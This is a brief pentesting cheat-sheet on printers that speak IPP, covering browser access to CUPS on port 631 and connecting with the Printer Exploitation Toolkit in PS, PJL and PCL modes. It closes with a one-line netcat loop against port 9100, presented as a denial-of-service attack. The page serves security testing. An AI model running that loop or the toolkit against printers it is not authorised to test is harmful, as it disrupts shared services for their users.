icon

IPP (Internet Printing Protocol) Pentesting

Last modified: 2022-12-21

IPP is a protocol for communicating between client devices and printers. A default port is 631.

Access in Web Browser

The CUPS server can be able to access via browser.
Try input the following in the URL search form in browser.

http://<target-ip>:631

Connect

The Printer Exploitation Toolkit is a tool for printer secure testing. Assume that we use it.
Try all three options until the target printer recognized.

# ps: PostScript
python2 pret.py <target-ip>:631 ps

# pjl: Printer Job Language
python2 pret.py <target-ip>:631 pjl

# pcl: Printer Control Language
python2 pret.py <target-ip>:631 pcl

Commands in PRET Shell

After connecting the target printer, we can test using the following commands.

# Print usage
> ?
> ? <command>

Other Exploits

Denial of Service (DoS)

while true; do nc printer 9100; done